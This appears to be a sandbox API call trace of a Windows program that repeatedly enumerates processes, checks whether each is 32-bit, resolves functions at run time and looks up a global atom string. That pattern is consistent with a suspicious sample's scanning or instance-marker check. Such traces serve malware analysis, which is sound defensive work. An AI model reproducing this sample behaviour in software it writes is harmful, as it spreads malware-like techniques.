	[0140.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.836] CloseHandle (hObject=0x2dc) returned 1
	[0140.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0140.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.837] CloseHandle (hObject=0x2dc) returned 1
	[0140.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.837] CloseHandle (hObject=0x2dc) returned 1
	[0140.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.838] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.854] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.854] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.855] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.855] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.855] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.855] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.855] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.855] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.855] CloseHandle (hObject=0x2dc) returned 1
	[0140.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0140.856] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.856] CloseHandle (hObject=0x2dc) returned 1
	[0140.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0140.856] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.856] CloseHandle (hObject=0x2dc) returned 1
	[0140.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0140.856] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.856] CloseHandle (hObject=0x2dc) returned 1
	[0140.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0140.857] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.857] CloseHandle (hObject=0x2dc) returned 1
	[0140.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0140.857] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.857] CloseHandle (hObject=0x2dc) returned 1
	[0140.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0140.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0140.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0140.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0140.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0140.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0140.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0140.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0140.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0140.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0140.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0140.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0140.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0140.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0140.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0140.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0140.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0140.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0140.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0140.944] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.944] CloseHandle (hObject=0x2dc) returned 1
	[0140.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0140.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0140.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0140.945] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.945] CloseHandle (hObject=0x2dc) returned 1
	[0140.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0140.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0140.945] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.945] CloseHandle (hObject=0x2dc) returned 1
	[0140.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0140.946] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.946] CloseHandle (hObject=0x2dc) returned 1
	[0140.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0140.946] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.946] CloseHandle (hObject=0x2dc) returned 1
	[0140.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0140.946] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.946] CloseHandle (hObject=0x2dc) returned 1
	[0140.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0140.946] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.946] CloseHandle (hObject=0x2dc) returned 1
	[0140.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0140.947] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.947] CloseHandle (hObject=0x2dc) returned 1
	[0140.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0140.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0140.947] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.947] CloseHandle (hObject=0x2dc) returned 1
	[0140.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0140.947] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.947] CloseHandle (hObject=0x2dc) returned 1
	[0140.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0140.948] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.948] CloseHandle (hObject=0x2dc) returned 1
	[0140.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0140.948] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.948] CloseHandle (hObject=0x2dc) returned 1
	[0140.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0140.948] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.948] CloseHandle (hObject=0x2dc) returned 1
	[0140.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0140.949] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.949] CloseHandle (hObject=0x2dc) returned 1
	[0140.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0140.949] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.949] CloseHandle (hObject=0x2dc) returned 1
	[0140.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0140.949] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.949] CloseHandle (hObject=0x2dc) returned 1
	[0140.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0140.950] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.950] CloseHandle (hObject=0x2dc) returned 1
	[0140.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0140.950] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.950] CloseHandle (hObject=0x2dc) returned 1
	[0140.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0140.950] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.950] CloseHandle (hObject=0x2dc) returned 1
	[0140.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0140.950] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.950] CloseHandle (hObject=0x2dc) returned 1
	[0140.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0140.951] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.951] CloseHandle (hObject=0x2dc) returned 1
	[0140.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0140.951] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.951] CloseHandle (hObject=0x2dc) returned 1
	[0140.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0140.951] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.951] CloseHandle (hObject=0x2dc) returned 1
	[0140.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0140.952] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.952] CloseHandle (hObject=0x2dc) returned 1
	[0140.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0140.952] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.952] CloseHandle (hObject=0x2dc) returned 1
	[0140.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0140.953] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.953] CloseHandle (hObject=0x2dc) returned 1
	[0140.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0140.953] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.953] CloseHandle (hObject=0x2dc) returned 1
	[0140.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0140.953] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.953] CloseHandle (hObject=0x2dc) returned 1
	[0140.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0140.954] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.954] CloseHandle (hObject=0x2dc) returned 1
	[0140.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.954] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.954] CloseHandle (hObject=0x2dc) returned 1
	[0140.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.955] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.955] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.955] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.955] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.956] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.956] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.956] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.956] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.956] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.956] CloseHandle (hObject=0x2dc) returned 1
	[0140.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0140.957] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.957] CloseHandle (hObject=0x2dc) returned 1
	[0140.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0140.957] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.957] CloseHandle (hObject=0x2dc) returned 1
	[0140.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0140.957] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.957] CloseHandle (hObject=0x2dc) returned 1
	[0140.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0140.958] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.958] CloseHandle (hObject=0x2dc) returned 1
	[0140.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0140.958] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.958] CloseHandle (hObject=0x2dc) returned 1
	[0140.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0140.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0140.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0140.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0140.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0140.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0140.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0140.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0140.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0140.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0140.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0140.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0140.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0140.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0140.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0140.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0140.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0140.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0140.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0140.995] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.995] CloseHandle (hObject=0x2dc) returned 1
	[0140.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0140.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0140.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0140.996] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.996] CloseHandle (hObject=0x2dc) returned 1
	[0140.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0140.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0140.996] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.996] CloseHandle (hObject=0x2dc) returned 1
	[0140.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0140.996] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.997] CloseHandle (hObject=0x2dc) returned 1
	[0140.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0140.997] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.997] CloseHandle (hObject=0x2dc) returned 1
	[0140.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0140.997] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.997] CloseHandle (hObject=0x2dc) returned 1
	[0140.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0140.997] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.997] CloseHandle (hObject=0x2dc) returned 1
	[0140.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0140.998] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.998] CloseHandle (hObject=0x2dc) returned 1
	[0140.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0140.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0140.998] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.998] CloseHandle (hObject=0x2dc) returned 1
	[0140.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0140.998] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.998] CloseHandle (hObject=0x2dc) returned 1
	[0140.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0140.999] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.999] CloseHandle (hObject=0x2dc) returned 1
	[0140.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0140.999] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.999] CloseHandle (hObject=0x2dc) returned 1
	[0140.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0140.999] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.999] CloseHandle (hObject=0x2dc) returned 1
	[0140.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0140.999] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.999] CloseHandle (hObject=0x2dc) returned 1
	[0141.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0141.000] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.000] CloseHandle (hObject=0x2dc) returned 1
	[0141.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0141.000] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.000] CloseHandle (hObject=0x2dc) returned 1
	[0141.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0141.000] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.000] CloseHandle (hObject=0x2dc) returned 1
	[0141.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0141.001] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.001] CloseHandle (hObject=0x2dc) returned 1
	[0141.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0141.001] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.001] CloseHandle (hObject=0x2dc) returned 1
	[0141.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0141.001] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.001] CloseHandle (hObject=0x2dc) returned 1
	[0141.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0141.001] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.001] CloseHandle (hObject=0x2dc) returned 1
	[0141.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0141.002] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.002] CloseHandle (hObject=0x2dc) returned 1
	[0141.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0141.002] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.002] CloseHandle (hObject=0x2dc) returned 1
	[0141.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0141.002] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.002] CloseHandle (hObject=0x2dc) returned 1
	[0141.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0141.002] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.002] CloseHandle (hObject=0x2dc) returned 1
	[0141.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0141.003] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.003] CloseHandle (hObject=0x2dc) returned 1
	[0141.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0141.003] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.003] CloseHandle (hObject=0x2dc) returned 1
	[0141.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0141.003] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.003] CloseHandle (hObject=0x2dc) returned 1
	[0141.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0141.003] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.004] CloseHandle (hObject=0x2dc) returned 1
	[0141.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0141.004] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.004] CloseHandle (hObject=0x2dc) returned 1
	[0141.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0141.004] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
